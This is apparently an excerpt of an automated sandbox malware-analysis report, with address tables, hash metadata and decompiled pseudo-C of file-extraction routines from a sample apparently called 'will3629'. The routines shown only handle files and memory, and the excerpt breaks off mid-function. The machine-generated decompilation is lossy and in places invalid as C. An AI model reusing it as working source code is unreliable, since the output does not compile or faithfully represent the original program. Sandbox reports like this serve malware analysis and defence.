                                                0x00ac4d2f
                                                0x00000000
                                                0x00ac4d2f
                                                0x00ac4d1c
                                                0x00ac4d1c
                                                0x00ac4d1f
                                                0x00ac4dcb
                                                0x00ac4dd0
                                                0x00ac4dd2
                                                0x00ac4ddd
                                                0x00ac4ddd
                                                0x00ac4de3
                                                0x00ac4de8
                                                0x00ac4ded
                                                0x00ac4ded
                                                0x00ac4def
                                                0x00ac4df0
                                                0x00ac4df0
                                                0x00ac4df4
                                                0x00ac4df4
                                                0x00ac4df6
                                                0x00ac4df9
                                                0x00ac4dfc
                                                0x00ac4dfc
                                                0x00ac4dfe
                                                0x00ac4dff
                                                0x00ac4dff
                                                0x00ac4e03
                                                0x00ac4e08
                                                0x00ac4e0a
                                                0x00ac4e0f
                                                0x00ac4d03
                                                0x00ac4d03
                                                0x00000000
                                                0x00ac4d03
                                                0x00ac4e18
                                                0x00ac4e20
                                                0x00ac4e25
                                                0x00ac4e27
                                                0x00000000
                                                0x00000000
                                                0x00ac4e33
                                                0x00ac4e38
                                                0x00ac4e3a
                                                0x00000000
                                                0x00000000
                                                0x00ac4e40
                                                0x00ac4e51
                                                0x00ac4e56
                                                0x00ac4e5b
                                                0x00ac4e5e
                                                0x00000000
                                                0x00000000
                                                0x00ac4e6a
                                                0x00ac4e6f
                                                0x00ac4e71
                                                0x00000000
                                                0x00000000
                                                0x00ac4e77
                                                0x00ac4e7d
                                                0x00000000
                                                0x00ac4e7d
                                                0x00ac4d25
                                                0x00ac4d25
                                                0x00ac4d28
                                                0x00ac4d36
                                                0x00ac4d3b
                                                0x00ac4d40
                                                0x00ac4d40
                                                0x00ac4d42
                                                0x00ac4d43
                                                0x00ac4d43
                                                0x00ac4d47
                                                0x00ac4d4a
                                                0x00ac4d4a
                                                0x00ac4d4c
                                                0x00ac4d4f
                                                0x00ac4d4f
                                                0x00ac4d51
                                                0x00ac4d52
                                                0x00ac4d52
                                                0x00ac4d56
                                                0x00ac4d5b
                                                0x00ac4d5d
                                                0x00ac4d62
                                                0x00000000
                                                0x00000000
                                                0x00ac4d67
                                                0x00ac4d6f
                                                0x00ac4d74
                                                0x00ac4d76
                                                0x00000000
                                                0x00000000
                                                0x00ac4d7c
                                                0x00ac4d84
                                                0x00ac4d89
                                                0x00ac4d8b
                                                0x00000000
                                                0x00000000
                                                0x00ac4d94
                                                0x00ac4d99
                                                0x00ac4d9e
                                                0x00ac4da1
                                                0x00ac4daa
                                                0x00ac4daa
                                                0x00ac4da3
                                                0x00ac4da3
                                                0x00ac4da3
                                                0x00ac4db5
                                                0x00ac4dbb
                                                0x00ac4dbd
                                                0x00000000
                                                0x00ac4dc3
                                                0x00ac4dc5
                                                0x00000000
                                                0x00ac4dc5
                                                0x00ac4dbd
                                                0x00ac4d2a
                                                0x00ac4d2a
                                                0x00ac4d2d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac4d2d
                                                0x00ac4cf8
                                                0x00ac4cfd
                                                0x00ac4d02
                                                0x00000000

                                                APIs
                                                • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00AC4DB5
                                                • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00AC4DDD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: AttributesFileItemText
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                • API String ID: 3625706803-183442868
                                                • Opcode ID: 8c29c6f5dd8158048974c55db1947a83448091239f776a9bb3deb0fe431dd8a2
                                                • Instruction ID: 9001f53cd83e2960d5e304939041894cdc2c078de90c24f63f59b07cb840577f
                                                • Opcode Fuzzy Hash: 8c29c6f5dd8158048974c55db1947a83448091239f776a9bb3deb0fe431dd8a2
                                                • Instruction Fuzzy Hash: 014103362042058ACB26AF28DA68FF677B5AB4D300F06466CE89397285DA31DE46C758
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00AC4C37(signed int __ecx, int __edx, int _a4) {
                                                				struct _FILETIME _v12;
                                                				struct _FILETIME _v20;
                                                				FILETIME* _t14;
                                                				int _t15;
                                                				signed int _t21;
                                                
                                                				_t21 = __ecx * 0x18;
                                                				if( *((intOrPtr*)(_t21 + 0xac8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                					L5:
                                                					return 0;
                                                				} else {
                                                					_t14 =  &_v12;
                                                					_t15 = SetFileTime( *(_t21 + 0xac8d74), _t14, _t14, _t14); // executed
                                                					if(_t15 == 0) {
                                                						goto L5;
                                                					}
                                                					return 1;
                                                				}
                                                			}








                                                0x00ac4c40
                                                0x00ac4c4a
                                                0x00ac4c8d
                                                0x00000000
                                                0x00ac4c70
                                                0x00ac4c70
                                                0x00ac4c7e
                                                0x00ac4c86
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac4c8a

                                                APIs
                                                • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00AC4C54
                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00AC4C66
                                                • SetFileTime.KERNELBASE(?,?,?,?), ref: 00AC4C7E
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: Time$File$DateLocal
                                                • String ID:
                                                • API String ID: 2071732420-0
                                                • Opcode ID: db82e68f36c284b867724da40adad9d0d8ae224852be3e2c6484ff13fc1e5bf2
                                                • Instruction ID: 6aff969f0ca4be2f762a6c7b312ae33679eda4700b29ac4430489d72c10b0e25
                                                • Opcode Fuzzy Hash: db82e68f36c284b867724da40adad9d0d8ae224852be3e2c6484ff13fc1e5bf2
                                                • Instruction Fuzzy Hash: 29F0B47260520CAF9F65DFB5CC58EBB77FCEB18345B4A052FA816C1060EA30D914C7A4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E00AC487A(CHAR* __ecx, signed int __edx) {
                                                				void* _t7;
                                                				CHAR* _t11;
                                                				long _t18;
                                                				long _t23;
                                                
                                                				_t11 = __ecx;
                                                				asm("sbb edi, edi");
                                                				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                				if((__edx & 0x00000100) == 0) {
                                                					asm("sbb esi, esi");
                                                					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                				} else {
                                                					if((__edx & 0x00000400) == 0) {
                                                						asm("sbb esi, esi");
                                                						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                					} else {
                                                						_t23 = 1;
                                                					}
                                                				}
                                                				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                				if(_t7 != 0xffffffff || _t23 == 3) {
                                                					return _t7;
                                                				} else {
                                                					E00AC490C(_t11);
                                                					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                				}
                                                			}







                                                0x00ac4880
                                                0x00ac488c
                                                0x00ac4894
                                                0x00ac48a0
                                                0x00ac48c9
                                                0x00ac48ce
                                                0x00ac48a2
                                                0x00ac48a8
                                                0x00ac48b7
                                                0x00ac48bc
                                                0x00ac48aa
                                                0x00ac48ac
                                                0x00ac48ac
                                                0x00ac48a8
                                                0x00ac48de
                                                0x00ac48e7
                                                0x00ac490b
                                                0x00ac48ee
                                                0x00ac48f0
                                                0x00000000
                                                0x00ac4902

                                                APIs
                                                • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00AC4A23,?,00AC4F67,*MEMCAB,00008000,00000180), ref: 00AC48DE
                                                • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00AC4F67,*MEMCAB,00008000,00000180), ref: 00AC4902
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 656d0de8a9b4bd5db34caf17d72d8bf01b4ec13dc4d18917bd80a9863a55aa53
                                                • Instruction ID: a21e6f710f41605b7b20a176be88113beea78421982446ba62adf1423097b594
                                                • Opcode Fuzzy Hash: 656d0de8a9b4bd5db34caf17d72d8bf01b4ec13dc4d18917bd80a9863a55aa53
                                                • Instruction Fuzzy Hash: A0016DA3E1157426F32481694C98FB7555CCBDE734F1B0338BDEAEB1D1D5644C0482E4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E00AC4AD0(signed int _a4, void* _a8, long _a12) {
                                                				signed int _t9;
                                                				int _t12;
                                                				signed int _t14;
                                                				signed int _t15;
                                                				void* _t20;
                                                				struct HWND__* _t21;
                                                				signed int _t24;
                                                				signed int _t25;
                                                
                                                				_t20 =  *0xac858c; // 0x268
                                                				_t9 = E00AC3680(_t20);
                                                				if( *0xac91d8 == 0) {
                                                					_push(_t24);
                                                					_t12 = WriteFile( *(0xac8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                					if(_t12 != 0) {
                                                						_t25 = _a12;
                                                						if(_t25 != 0xffffffff) {
                                                							_t14 =  *0xac9400; // 0xba600
                                                							_t15 = _t14 + _t25;
                                                							 *0xac9400 = _t15;
                                                							if( *0xac8184 != 0) {
                                                								_t21 =  *0xac8584; // 0x0
                                                								if(_t21 != 0) {
                                                									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xac93f8, 0);
                                                								}
                                                							}
                                                						}
                                                					} else {
                                                						_t25 = _t24 | 0xffffffff;
                                                					}
                                                					return _t25;
                                                				} else {
                                                					return _t9 | 0xffffffff;
                                                				}
                                                			}











                                                0x00ac4ad5
                                                0x00ac4adb
                                                0x00ac4ae7
                                                0x00ac4aee
                                                0x00ac4b05
                                                0x00ac4b0d
                                                0x00ac4b14
                                                0x00ac4b1a
                                                0x00ac4b1c
                                                0x00ac4b21
                                                0x00ac4b2a
                                                0x00ac4b2f
                                                0x00ac4b31
                                                0x00ac4b39
                                                0x00ac4b54
                                                0x00ac4b54
                                                0x00ac4b39
                                                0x00ac4b2f
                                                0x00ac4b0f
                                                0x00ac4b0f
                                                0x00ac4b0f
                                                0x00ac4b5e
                                                0x00ac4ae9
                                                0x00ac4aed
                                                0x00ac4aed

                                                APIs
                                                  • Part of subcall function 00AC3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00AC369F
                                                  • Part of subcall function 00AC3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00AC36B2
                                                  • Part of subcall function 00AC3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00AC36DA
                                                • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00AC4B05
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                • String ID:
                                                • API String ID: 1084409-0
                                                • Opcode ID: de3fde7f1140a792da1013587ca330e709090a69df36d7ab70c0eeb04d21275f
                                                • Instruction ID: 88bca7b1701e763a89e8129d5a8aca21e5bdc7f8232866f3cd5226727b4563f9
                                                • Opcode Fuzzy Hash: de3fde7f1140a792da1013587ca330e709090a69df36d7ab70c0eeb04d21275f
                                                • Instruction Fuzzy Hash: F5016D31240205ABDB14CF98DC19FA27799B748726F0A8229E9399A1E0CB70DC12CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00AC658A(char* __ecx, void* __edx, char* _a4) {
                                                				intOrPtr _t4;
                                                				char* _t6;
                                                				char* _t8;
                                                				void* _t10;
                                                				void* _t12;
                                                				char* _t16;
                                                				intOrPtr* _t17;
                                                				void* _t18;
                                                				char* _t19;
                                                
                                                				_t16 = __ecx;
                                                				_t10 = __edx;
                                                				_t17 = __ecx;
                                                				_t1 = _t17 + 1; // 0xac8b3f
                                                				_t12 = _t1;
                                                				do {
                                                					_t4 =  *_t17;
                                                					_t17 = _t17 + 1;
                                                				} while (_t4 != 0);
                                                				_t18 = _t17 - _t12;
                                                				_t2 = _t18 + 1; // 0xac8b40
                                                				if(_t2 < __edx) {
                                                					_t19 = _t18 + __ecx;
                                                					if(_t19 > __ecx) {
                                                						_t8 = CharPrevA(__ecx, _t19); // executed
                                                						if( *_t8 != 0x5c) {
                                                							 *_t19 = 0x5c;
                                                							_t19 =  &(_t19[1]);
                                                						}
                                                					}
                                                					_t6 = _a4;
                                                					 *_t19 = 0;
                                                					while( *_t6 == 0x20) {
                                                						_t6 = _t6 + 1;
                                                					}
                                                					return E00AC16B3(_t16, _t10, _t6);
                                                				}
                                                				return 0x8007007a;
                                                			}












                                                0x00ac6592
                                                0x00ac6594
                                                0x00ac6596
                                                0x00ac6598
                                                0x00ac6598
                                                0x00ac659b
                                                0x00ac659b
                                                0x00ac659d
                                                0x00ac659e
                                                0x00ac65a2
                                                0x00ac65a4
                                                0x00ac65a9
                                                0x00ac65b2
                                                0x00ac65b6
                                                0x00ac65ba
                                                0x00ac65c3
                                                0x00ac65c5
                                                0x00ac65c8
                                                0x00ac65c8
                                                0x00ac65c3
                                                0x00ac65c9
                                                0x00ac65cc
                                                0x00ac65d2
                                                0x00ac65d1
                                                0x00ac65d1
                                                0x00000000
                                                0x00ac65dc
                                                0x00000000

                                                APIs
                                                • CharPrevA.USER32(00AC8B3E,00AC8B3F,00000001,00AC8B3E,-00000003,?,00AC60EC,00AC1140,?), ref: 00AC65BA
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: CharPrev
                                                • String ID:
                                                • API String ID: 122130370-0
                                                • Opcode ID: b4d54a0eff5af7daa943dc94623932cd4e5cf542f165b8858e685caa9a11780d
                                                • Instruction ID: 5e425b01b5cc9ef4db3d2b980295d69f2525f3b385cda31624d4dfc59d1bc5f5
                                                • Opcode Fuzzy Hash: b4d54a0eff5af7daa943dc94623932cd4e5cf542f165b8858e685caa9a11780d
                                                • Instruction Fuzzy Hash: 55F042725042545BD3318A1D9884F76BFDD9BC6350F3A015EE8DAC7205CA654C4683A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E00AC621E() {
                                                				signed int _v8;
                                                				char _v268;
                                                				signed int _t5;
                                                				void* _t9;
                                                				void* _t13;
                                                				void* _t19;
                                                				void* _t20;
                                                				signed int _t21;
                                                
                                                				_t5 =  *0xac8004; // 0xc32e3ded
                                                				_v8 = _t5 ^ _t21;
                                                				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                					0x4f0 = 2;
                                                					_t9 = E00AC597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                				} else {
                                                					E00AC44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                					 *0xac9124 = E00AC6285();
                                                					_t9 = 0;
                                                				}
                                                				return E00AC6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                			}











                                                0x00ac6229
                                                0x00ac6230
                                                0x00ac6247
                                                0x00ac626a
                                                0x00ac6272
                                                0x00ac6249
                                                0x00ac6255
                                                0x00ac625f
                                                0x00ac6264
                                                0x00ac6264
                                                0x00ac6284

                                                APIs
                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00AC623F
                                                  • Part of subcall function 00AC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00AC4518
                                                  • Part of subcall function 00AC44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00AC4554
                                                  • Part of subcall function 00AC6285: GetLastError.KERNEL32(00AC5BBC), ref: 00AC6285
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                • String ID:
                                                • API String ID: 381621628-0
                                                • Opcode ID: 4afe8a9e49b84326b83116acd54268dd5db7bdc20449f02658f085cfe920737a
                                                • Instruction ID: 20e66b8aa83a1c0080070f2a2d671832705f9aa59dfa2db82335c0da256ec641
                                                • Opcode Fuzzy Hash: 4afe8a9e49b84326b83116acd54268dd5db7bdc20449f02658f085cfe920737a
                                                • Instruction Fuzzy Hash: D9F0E2B0B04208ABE750EBB48E06FFF33FCDB58300F42006EB986D6091EE749D858650
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00AC4B60(signed int _a4) {
                                                				signed int _t9;
                                                				signed int _t15;
                                                
                                                				_t15 = _a4 * 0x18;
                                                				if( *((intOrPtr*)(_t15 + 0xac8d64)) != 1) {
                                                					_t9 = FindCloseChangeNotification( *(_t15 + 0xac8d74)); // executed
                                                					if(_t9 == 0) {
                                                						return _t9 | 0xffffffff;
                                                					}
                                                					 *((intOrPtr*)(_t15 + 0xac8d60)) = 1;
                                                					return 0;
                                                				}
                                                				 *((intOrPtr*)(_t15 + 0xac8d60)) = 1;
                                                				 *((intOrPtr*)(_t15 + 0xac8d68)) = 0;
                                                				 *((intOrPtr*)(_t15 + 0xac8d70)) = 0;
                                                				 *((intOrPtr*)(_t15 + 0xac8d6c)) = 0;
                                                				return 0;
                                                			}





                                                0x00ac4b66
                                                0x00ac4b74
                                                0x00ac4b98
                                                0x00ac4ba0
                                                0x00000000
                                                0x00ac4bac
                                                0x00ac4ba4
                                                0x00000000
                                                0x00ac4ba4
                                                0x00ac4b78
                                                0x00ac4b7e
                                                0x00ac4b84
                                                0x00ac4b8a
                                                0x00000000

                                                APIs
                                                • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00AC4FA1,00000000), ref: 00AC4B98
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: ChangeCloseFindNotification
                                                • String ID:
                                                • API String ID: 2591292051-0
                                                • Opcode ID: 4664117ba88106b876a9abd8b9428fa4f5bc7529fadffa20b42ee79d07d1a281
                                                • Instruction ID: 5a77bb22ea677372d900bd9a9a878ef20278df6b289944463faf2463a58a3a35
                                                • Opcode Fuzzy Hash: 4664117ba88106b876a9abd8b9428fa4f5bc7529fadffa20b42ee79d07d1a281
                                                • Instruction Fuzzy Hash: 56F01275500B089E5B72CF39DC00F53BBF4BAA63613170D2E946FD2190DB34A841CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00AC66AE(CHAR* __ecx) {
                                                				unsigned int _t1;
                                                
                                                				_t1 = GetFileAttributesA(__ecx); // executed
                                                				if(_t1 != 0xffffffff) {
                                                					return  !(_t1 >> 4) & 0x00000001;
                                                				} else {
                                                					return 0;
                                                				}
                                                			}




                                                0x00ac66b1
                                                0x00ac66ba
                                                0x00ac66c7
                                                0x00ac66bc
                                                0x00ac66be
                                                0x00ac66be

                                                APIs
                                                • GetFileAttributesA.KERNELBASE(?,00AC4777,?,00AC4E38,?), ref: 00AC66B1
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 6b3d8d3b27ec2c591d3af0700148bf88884a4a348b65f096e40afab6309cd66e
                                                • Instruction ID: 6af95a4febb6054d52b396dcba2dc27d12273edd46ff6ace6ddc73cf04c5dc34
                                                • Opcode Fuzzy Hash: 6b3d8d3b27ec2c591d3af0700148bf88884a4a348b65f096e40afab6309cd66e
                                                • Instruction Fuzzy Hash: ABB09276222444826A2487716C29A662941A6D123A7E61B94F032C01E0CA3EC846E004
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00AC4CA0(long _a4) {
                                                				void* _t2;
                                                
                                                				_t2 = GlobalAlloc(0, _a4); // executed
                                                				return _t2;
                                                			}




                                                0x00ac4caa
                                                0x00ac4cb1

                                                APIs
                                                • GlobalAlloc.KERNELBASE(00000000,?), ref: 00AC4CAA
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: AllocGlobal
                                                • String ID:
                                                • API String ID: 3761449716-0
                                                • Opcode ID: 92f7c4fbb0423708c115c63882190e830966de6a3acd0668863d0c4e0c7a0372
                                                • Instruction ID: e59fe1483843290ceca5976b51c8dbe98e27903ba6e5a8c1443c277ccb55f90a
                                                • Opcode Fuzzy Hash: 92f7c4fbb0423708c115c63882190e830966de6a3acd0668863d0c4e0c7a0372
                                                • Instruction Fuzzy Hash: 8EB0123204420CB7CF001FC2EC09F953F5DE7C47A5F150000F60C45450CA7294118696
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00AC4CC0(void* _a4) {
                                                				void* _t2;
                                                
                                                				_t2 = GlobalFree(_a4); // executed
                                                				return _t2;
                                                			}




                                                0x00ac4cc8
                                                0x00ac4ccf

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: FreeGlobal
                                                • String ID:
                                                • API String ID: 2979337801-0
                                                • Opcode ID: ac620d6c7eedb070be5778b44fe6327de0047fe2e93bee68882d96d892dad493
                                                • Instruction ID: fd4bd4d79ac2bd4df00c009b2ea087630dfbe93262e7b0302327ae88c30ba7f0
                                                • Opcode Fuzzy Hash: ac620d6c7eedb070be5778b44fe6327de0047fe2e93bee68882d96d892dad493
                                                • Instruction Fuzzy Hash: EFB0123100010CB78F001B82EC08C553F5DD6C02A47010010F50C41421CB3398128585
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E00AC5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				CHAR* _v265;
                                                				char _v266;
                                                				char _v267;
                                                				char _v268;
                                                				CHAR* _v272;
                                                				char _v276;
                                                				signed int _v296;
                                                				char _v556;
                                                				signed int _t61;
                                                				int _t63;
                                                				char _t67;
                                                				CHAR* _t69;
                                                				signed int _t71;
                                                				void* _t75;
                                                				char _t79;
                                                				void* _t83;
                                                				void* _t85;
                                                				void* _t87;
                                                				intOrPtr _t88;
                                                				void* _t100;
                                                				intOrPtr _t101;
                                                				CHAR* _t104;
                                                				intOrPtr _t105;
                                                				void* _t111;
                                                				void* _t115;
                                                				CHAR* _t118;
                                                				void* _t119;
                                                				void* _t127;
                                                				CHAR* _t129;
                                                				void* _t132;
                                                				void* _t142;
                                                				signed int _t143;
                                                				CHAR* _t144;
                                                				void* _t145;
                                                				void* _t146;
                                                				void* _t147;
                                                				void* _t149;
                                                				char _t155;
                                                				void* _t157;
                                                				void* _t162;
                                                				void* _t163;
                                                				char _t167;
                                                				char _t170;
                                                				CHAR* _t173;
                                                				void* _t177;
                                                				intOrPtr* _t183;
                                                				intOrPtr* _t192;
                                                				CHAR* _t199;
                                                				void* _t200;
                                                				CHAR* _t201;
                                                				void* _t205;
                                                				void* _t206;
                                                				int _t209;
                                                				void* _t210;
                                                				void* _t212;
                                                				void* _t213;
                                                				CHAR* _t218;
                                                				intOrPtr* _t219;
                                                				intOrPtr* _t220;
                                                				signed int _t221;
                                                				signed int _t223;
                                                
                                                				_t173 = __ecx;
                                                				_t61 =  *0xac8004; // 0xc32e3ded
                                                				_v8 = _t61 ^ _t221;
                                                				_push(__ebx);
                                                				_push(__esi);
                                                				_push(__edi);
